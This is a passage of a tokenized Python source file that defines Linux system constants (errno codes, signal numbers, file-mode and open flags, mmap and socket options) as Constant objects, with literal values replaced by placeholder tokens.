MAP_32BIT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> INADDR_ANY = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> INADDR_BROADCAST = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> INADDR_NONE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> INADDR_LOOPBACK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EPERM = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> ENOENT = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> ESRCH = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> EINTR = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> EIO = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> ENXIO = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> E2BIG = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> ENOEXEC = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> EBADF = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> ECHILD = Constant ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> EAGAIN = Constant ( '<STR_LIT>' , <NUM_LIT:11> ) <EOL> ENOMEM = Constant ( '<STR_LIT>' , <NUM_LIT:12> ) <EOL> EACCES = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EFAULT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOTBLK = Constant ( '<STR_LIT>' , <NUM_LIT:15> ) <EOL> EBUSY = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> EEXIST = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EXDEV = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENODEV = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOTDIR = Constant ( '<STR_LIT>' , <NUM_LIT:20> ) <EOL> EISDIR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EINVAL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENFILE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EMFILE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOTTY = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ETXTBSY = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EFBIG = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOSPC = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ESPIPE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EROFS = Constant ( '<STR_LIT>' , <NUM_LIT:30> ) <EOL> EMLINK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EPIPE = Constant ( '<STR_LIT>' , <NUM_LIT:32> ) <EOL> EDOM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ERANGE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EDEADLK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENAMETOOLONG = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOLCK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOSYS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOTEMPTY = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ELOOP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EWOULDBLOCK = Constant ( '<STR_LIT>' , <NUM_LIT:11> ) <EOL> ENOMSG = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EIDRM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ECHRNG = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EL2NSYNC = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EL3HLT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EL3RST = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ELNRNG = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EUNATCH = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOCSI = Constant ( '<STR_LIT>' , <NUM_LIT:50> ) <EOL> EL2HLT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EBADE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EBADR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EXFULL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOANO = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EBADRQC = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EBADSLT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EDEADLOCK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EBFONT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOSTR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENODATA = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ETIME = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOSR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENONET = Constant ( '<STR_LIT>' , <NUM_LIT:64> ) <EOL> ENOPKG = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EREMOTE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOLINK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EADV = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ESRMNT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ECOMM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EPROTO = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EMULTIHOP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EDOTDOT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EBADMSG = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EOVERFLOW = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOTUNIQ = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EBADFD = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EREMCHG = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ELIBACC = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ELIBBAD = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ELIBSCN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ELIBMAX = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ELIBEXEC = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EILSEQ = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ERESTART = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ESTRPIPE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EUSERS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOTSOCK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EDESTADDRREQ = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EMSGSIZE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EPROTOTYPE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOPROTOOPT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EPROTONOSUPPORT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ESOCKTNOSUPPORT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EOPNOTSUPP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOTSUP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EPFNOSUPPORT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EAFNOSUPPORT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EADDRINUSE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EADDRNOTAVAIL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENETDOWN = Constant ( '<STR_LIT>' , <NUM_LIT:100> ) <EOL> ENETUNREACH = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENETRESET = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ECONNABORTED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ECONNRESET = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOBUFS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EISCONN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOTCONN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ESHUTDOWN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ETOOMANYREFS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ETIMEDOUT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ECONNREFUSED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EHOSTDOWN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EHOSTUNREACH = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EALREADY = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EINPROGRESS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ESTALE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EUCLEAN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOTNAM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENAVAIL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EISNAM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EREMOTEIO = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EDQUOT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOMEDIUM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EMEDIUMTYPE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ECANCELED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOKEY = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EKEYEXPIRED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EKEYREVOKED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EKEYREJECTED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __SYS_NERR = Constant ( '<STR_LIT>' , ( ( <NUM_LIT> ) + <NUM_LIT:1> ) ) <EOL> __LITTLE_ENDIAN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __BIG_ENDIAN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __BYTE_ORDER = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __FLOAT_WORD_ORDER = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> LITTLE_ENDIAN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> BIG_ENDIAN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> BYTE_ORDER = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __WORDSIZE = Constant ( '<STR_LIT>' , <NUM_LIT:32> ) <EOL> __FSUID_H = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> NSIG = Constant ( '<STR_LIT>' , <NUM_LIT:32> ) <EOL> _NSIG = Constant ( '<STR_LIT>' , <NUM_LIT:64> ) <EOL> SIGHUP = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SIGINT = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> SIGQUIT = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> SIGILL = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> SIGTRAP = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> SIGABRT = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> SIGIOT = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> SIGFPE = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> SIGKILL = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> SIGSEGV = Constant ( '<STR_LIT>' , <NUM_LIT:11> ) <EOL> SIGPIPE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGALRM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGTERM = Constant ( '<STR_LIT>' , <NUM_LIT:15> ) <EOL> SIGUNUSED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGBUS = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> SIGUSR1 = Constant ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> SIGUSR2 = Constant ( '<STR_LIT>' , <NUM_LIT:12> ) <EOL> SIGSTKFLT = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> SIGCHLD = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGCONT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGSTOP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGTSTP = Constant ( '<STR_LIT>' , <NUM_LIT:20> ) <EOL> SIGTTIN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGTTOU = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGURG = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGXCPU = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGXFSZ = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGVTALRM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGPROF = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGWINCH = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGIO = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGPWR = Constant ( '<STR_LIT>' , <NUM_LIT:30> ) <EOL> SIGSYS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGCLD = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGPOLL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGLOST = Constant ( '<STR_LIT>' , <NUM_LIT:30> ) <EOL> SIGRTMIN = Constant ( '<STR_LIT>' , <NUM_LIT:32> ) <EOL> SIGRTMAX = Constant ( '<STR_LIT>' , ( <NUM_LIT:64> - <NUM_LIT:1> ) ) <EOL> SA_NOCLDSTOP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SA_NOCLDWAIT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SA_SIGINFO = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SA_RESTORER = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SA_ONSTACK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SA_RESTART = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SA_INTERRUPT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SA_NODEFER = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SA_RESETHAND = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SA_NOMASK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SA_ONESHOT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SS_ONSTACK = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SS_DISABLE = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> MINSIGSTKSZ = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGSTKSZ = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIG_BLOCK = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> SIG_UNBLOCK = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SIG_SETMASK = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> SI_MAX_SIZE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGEV_SIGNAL = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> SIGEV_NONE = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SIGEV_THREAD = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> SIGEV_THREAD_ID = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> SIGEV_MAX_SIZE = Constant ( '<STR_LIT>' , <NUM_LIT:64> ) <EOL> _SYS_TIME_H = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> ITIMER_REAL = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> ITIMER_VIRTUAL = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> ITIMER_PROF = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> X86_FXSR_MAGIC = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> FD_SETSIZE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> R_OK = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> W_OK = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> X_OK = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> F_OK = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> SEEK_SET = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> SEEK_CUR = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SEEK_END = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> STDIN_FILENO = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> STDOUT_FILENO = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> STDERR_FILENO = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> _CS_PATH = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> _SC_CLK_TCK = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> _SC_ARG_MAX = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> _SC_NGROUPS_MAX = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> _SC_OPEN_MAX = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> _SC_PAGESIZE = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> _SC_NPROCESSORS_ONLN = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> _SC_NPROCESSORS_CONF = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> _SC_PHYS_PAGES = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> _PC_PATH_MAX = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> _PC_VDISABLE = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> L_cuserid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> _POSIX_VERSION = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> F_ULOCK = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> F_LOCK = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> F_TLOCK = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> F_TEST = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> STAT64_HAS_BROKEN_ST_INO = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> S_IFMT = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT> ) <EOL> S_IFSOCK = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> S_IFLNK = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> S_IFREG = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> S_IFBLK = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT> ) <EOL> S_IFDIR = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT> ) <EOL> S_IFCHR = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT> ) <EOL> S_IFIFO = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT> ) <EOL> S_ISUID = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT> ) <EOL> S_ISGID = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT> ) <EOL> S_ISVTX = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT:1000> ) <EOL> S_IRWXU = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT> ) <EOL> S_IRUSR = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT> ) <EOL> S_IWUSR = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT:200> ) <EOL> S_IXUSR = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT:100> ) <EOL> S_IRWXG = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT> ) <EOL> S_IRGRP = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT> ) <EOL> S_IWGRP = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT:20> ) <EOL> S_IXGRP = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT:10> ) <EOL> S_IRWXO = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT:7> ) <EOL> S_IROTH = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT:4> ) <EOL> S_IWOTH = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT:2> ) <EOL> S_IXOTH = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT:1> ) <EOL> S_IREAD = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT> ) <EOL> S_IWRITE = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT:200> ) <EOL> S_IEXEC = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT:100> ) <EOL> F_LINUX_SPECIFIC_BASE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> O_ACCMODE = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT:3> ) <EOL> O_RDONLY = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> O_WRONLY = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT:1> ) <EOL> O_RDWR = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT:2> ) <EOL> O_CREAT = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT:100> ) <EOL> O_EXCL = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT:200> ) <EOL> O_NOCTTY = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> O_TRUNC = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT:1000> ) <EOL> O_APPEND = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> O_NONBLOCK = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> O_NDELAY = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> O_SYNC = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> FASYNC = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> O_DIRECT = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> O_LARGEFILE = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> O_DIRECTORY = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> O_NOFOLLOW = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> O_NOATIME = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> F_DUPFD = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> F_GETFD = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> F_SETFD = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> F_GETFL = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> F_SETFL = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> F_GETLK = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> F_SETLK = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> F_SETLKW = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> F_SETOWN = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> F_GETOWN = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> F_SETSIG = Constant ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> F_GETSIG = Constant ( '<STR_LIT>' , <NUM_LIT:11> ) <EOL> F_GETLK64 = Constant ( '<STR_LIT>' , <NUM_LIT:12> ) <EOL> F_SETLK64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> F_SETLKW64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> FD_CLOEXEC = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> F_RDLCK = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> F_WRLCK = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> F_UNLCK = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> F_EXLCK = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> F_SHLCK = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> F_INPROGRESS = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> LOCK_SH = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> LOCK_EX = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> LOCK_NB = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> LOCK_UN = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> LOCK_MAND = Constant ( '<STR_LIT>' , <NUM_LIT:32> ) <EOL> LOCK_READ = Constant ( '<STR_LIT>' , <NUM_LIT:64> ) <EOL> LOCK_WRITE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> LOCK_RW = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> O_ASYNC = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> MREMAP_MAYMOVE = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> MREMAP_FIXED = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> PROT_READ = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PROT_WRITE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PROT_EXEC = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PROT_NONE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MAP_SHARED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MAP_PRIVATE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MAP_FIXED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MAP_ANONYMOUS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MAP_GROWSDOWN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MAP_DENYWRITE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MAP_EXECUTABLE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MAP_LOCKED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MAP_NORESERVE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MAP_POPULATE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MS_ASYNC = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> MS_INVALIDATE = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> MS_SYNC = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> MCL_CURRENT = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> MCL_FUTURE = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> MADV_NORMAL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MADV_RANDOM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MADV_SEQUENTIAL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MADV_WILLNEED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MADV_DONTNEED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MAP_ANON = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MAP_FILE = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> SOL_SOCKET = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SO_DEBUG = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SO_REUSEADDR = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> SO_TYPE = Constant ( '<STR_LIT>' , 